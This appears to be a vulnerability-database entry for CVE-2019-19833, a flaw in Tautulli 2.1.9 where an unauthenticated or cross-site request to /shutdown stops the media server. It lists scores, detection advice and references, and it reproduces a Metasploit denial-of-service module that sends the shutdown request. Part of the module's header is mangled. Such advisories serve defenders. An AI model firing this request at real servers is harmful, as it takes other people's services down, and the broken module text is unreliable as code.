CVE-2019-19833
published 2019-12-18CVE-2019-19833: In Tautulli 2.1.9, CSRF in the /shutdown URI allows an attacker to shut down the remote media server. (Also, anonymous access can be achieved in applications…
PriorityP347medium6.5CVSS 3.1
AVNACLPRNUIRSUCNINAH
EXPLOIT
EPSS
14.71%
96.2th percentile
In Tautulli 2.1.9, CSRF in the /shutdown URI allows an attacker to shut down the remote media server. (Also, anonymous access can be achieved in applications that do not have a user login area).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tautulli | tautulli | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for unauthenticated or cross-origin HTTP requests to the /shutdown endpoint on Tautulli instances. ↗
- →Alert on anonymous access attempts to Tautulli endpoints, particularly /shutdown, in applications lacking a user login area. ↗
- →Detect HTTP requests targeting the /shutdown URL on Tautulli servers, especially from unexpected or external referrers (CSRF vector). ↗
- ·The vulnerability affects Tautulli 2.1.9 and prior; ensure version scope is confirmed before applying detections. ↗
- ·Anonymous access exploitation is only possible in Tautulli deployments that do not have a user login area configured. ↗
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Tautulli 2.1.9 - Denial of Service (Metasploit)
exploitdb·2020-01-16
Tautulli 2.1.9 - Denial of Service (Metasploit)
Tautulli 2.1.9 - Denial of Service (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Tautulli v2.1.9 - Shutdown Denial of Service',
'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
'Author' => 'Ismail Tasdelen',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-19833'],
['EDB', '47785']
]
)
register_options([ Opt::RPORT(8181) ])
end
def run
res = send_request_raw({
'method' => 'GET',
'uri' => '/shutdown'
})
if res
print_status("Request sent to #{rhost}")
else
print_status("No reply from #{rhost}")
end
rescue Errno::ECONNRESET
print_status('Connection reset')
end
end
Metasploit
Tautulli v2.1.9 - Shutdown Denial of Service
metasploit
Tautulli v2.1.9 - Shutdown Denial of Service
Tautulli v2.1.9 - Shutdown Denial of Service
Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/155710/Tautulli-2.1.9-Cross-Site-Request-Forgery.htmlhttp://packetstormsecurity.com/files/155974/Tautulli-2.1.9-Denial-Of-Service.htmlhttps://github.com/Tautulli/Tautulli/compare/v2.1.9...v2.1.10-betahttp://packetstormsecurity.com/files/155710/Tautulli-2.1.9-Cross-Site-Request-Forgery.htmlhttp://packetstormsecurity.com/files/155974/Tautulli-2.1.9-Denial-Of-Service.htmlhttps://github.com/Tautulli/Tautulli/compare/v2.1.9...v2.1.10-beta
2019-12-18
Published